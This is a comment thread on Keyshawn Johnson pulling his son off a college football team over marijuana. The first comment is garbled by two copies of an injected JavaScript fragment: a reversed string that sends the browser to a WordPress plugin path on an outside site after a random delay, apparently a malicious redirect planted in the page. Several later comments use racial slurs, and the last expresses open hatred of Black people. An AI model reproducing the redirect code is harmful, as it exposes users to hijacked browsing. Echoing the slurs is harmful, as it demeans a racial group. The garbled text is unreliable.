It’s clear that Keyshawn Johnson has a strict zero-toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolerance policy when it comes toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to marijuana. Definitely the rt move for an example look at Cris Carters son Duron who was at Bama and Ohio State he had numerous issues and had NFL potential never made a successful career KJ stepping n and doing what a gd dad should and would he allowing his son to still have a chance

I tell you one thing, I like her top.

  3. AveolarD says:

it's a privilege to play sports on any college football time.  if you want to be a weedhead and ruin the named legacy, then do it on your dime, not your parents nor the schools'. hate punk azz kids who think they are beyond reproach.  good going Keyshawn Sr., knock some Susan A. Dorsey sense into this boyz head. Continue to golden that template Pops.

  4. Marshaun Byrd says:

I tip my hat to keyshawn j for taking his son off of the team he knows what makes his son tick good intervention on his part.

  5. Ziggy Tafari says:

that was fucked up way too harsh but it could effect him on the next level if he continues.

like calling the cops on your kid- now he has told the world his kid is a problem..that move cost the kid a chance at pro ball- probably. kinda dumb.. some things best handled behind closed doors.

  9. yada mean says:

niggas get high every bay b you be alright you tough right…
everybody in the NFL smokes weed gtfoh

  10. Harry Ellerby says:

SOMETHING TELLS ME THIS ISN'T THE KIDS FIRST TIME SMOKING. KEYSHAWN, THIS ISN'T GRADE SCHOOL WHICH IS WHERE THIS SHOULD'VE BEEN NIPPED IN THE BUD IN THE FIRST PLACE. IT'S A LITTLE LATE FOR THIS TYPE OF REACTION DAD. ALLOW THE UNIVERSITY TO HANDLE THE SITUATION. LET THE YOUNG MAN EXPERIENCE ADVERSITY, SUFFER THE CONSEQUENCES AND LEARN FROM IT. YOU WON'T BE ABLE TO DO THIS WHEN HE GETS OUT INTO THE REAL WORLD. WHAT'S NEXT? TAKING AWAY HIS DRIVING PRIVILEGES FOR HAVING SEX WITH THE CHEERLEADERS? C'MON MAN!!

    Good man Key!!!!!!!

  12. Erik Hopkins says:

    Amen BRO!

  13. jr5607 says:

if he get popped on a ncaa drug screen they will drop his scholarship so i see where he coming from

  14. Antwuan Bradshaw says:

That sounds good and all but the realistic side of it is that scholarship was wasted on a kid who's parent took him off the team, not that he was kicked off the team……yea he is a young adult, but he is an "adult"…….he made a dumb decision and got caught. Young adults do that. Let the reality of his situation discipline him so that he can learn as an adult. Putting him on punishment (taking him off the team) til he acts better says that he isn't capable of making a mature choice of learning from his mistake without Daddy's help.

A college scholarship is not a Xbox or cell phone…..A parent should have the authority to take it away and give it back when they see fit according to their child's actions. That child signed a letter of intent…..a legal document…….Overall Nebraska is without a 4 star recruit that they spent a great deal of time trying to get on campus. The decision for that individual to be taken off the roster should have been the coaching staff and athletic department…………

Respect to Keyshawn Sr. for being a father, but part of parenting is allowing your kids to make mistakes so they can learn, not sheltering them from consequence.

  15. Hector Rodriquez says:

Jr lived a very privileged life in posh Calabasas courtesy of his dad who grew up struggling in South central LA. Kudos to SR. for holding JR. accountable for his actions.

  16. ImGonSay It Anyway says:

I SMOKE EVERYDAY.. SOUR EVERY HOUR.. WHAT PEOPLE NEED TO STOP SAYING IS "CANNABIS NOT ADDICTIVE IT'S HEALTHY" KNOCK THAT BULLSHIT OFF.. I LOVE MY GREENS, BUT I'M NOT THAT DUMB.. THANKS TO THE U.S. GOVERNMENT THEY FOUND A WAY TO LIE ABOUT IT HELPING CERTAIN HEALTH ISSUES, ONLY SO THEY CAN MONOPOLIZE OFF OF SOMETHING THE CANT STOP FROM BEING SOLD.. BUT STILL THE BEST COMES FROM THE STREET PHARMACISTS..

  17. Zeke Alcantar says:

  21. iGOTCHYA_601 says:

Just saying the dads not wrong but he's going to push his son away

  22. Stephen 1 says:

More youth today need the discipline only a positive father can dish out! Spare the Rod and You Spoil the Child!!!! Self-accountability is missing from the youth if today!

  23. Boogie Walker says:

The point is he a kid and opportunity… he also needs to understand it's ok to smoke weed IF THE RULES ALLOWED IT but they don't. When he get on his own he can do whatever and maybe his dad trying to show him a better path. Weed still not legal everywhere, a felony can ruin his life. Some of y'all answers are pure ignorant….

I smoke but I'm not a parent this Over board

  27. El Chapo says:

my mom did the same thing to me when she found my stash

  28. King Willie says:

I'm sure all of the children think the father is overreacting, but that's why you are children. The NFL has a zero tolerance policy so you need to have your shit together from jump. It's no accident that the majority of the clowns who lose NFL jobs due to weed infractions were fatherless as kids.

  29. Justin Adams says:

son or not how you pull a grown man off a football team he need to be a man and stand up to his dad

  30. Jesse Rouson says:

It's great he's being a father but the kids not gonna stop smoking let's be honest. He might take a break for a few months for football but best believe he gon be bob marley with the shit in the offseason

  31. M. Perial FeeZe says:

Jr. was fortunate enough to grow up rich so he may have a sense of entitlement.. this is a great way to send a message, but I hope it doesn't derail his career & send him on a downward spiral

  32. lionel howell says:

love it !!!!  this is what a real dad is supposed to do, STEP IN!!!! his dad is well off so he can do that without any regret………

  33. Iverson says:

He did the right thing nuff said I swear you people are idiots

  41. Matt Petersen says:

When niggas dont know how to be disciplined and live by principles and obey the regulations, they will always be in conflict. These dumb motherfuckers in the comments section demonizing a father for disciplining his son but these same hoodrats are the ones talking about deadbeat black fathers. I hate the black community so much for its hypocrisy and stupidity.
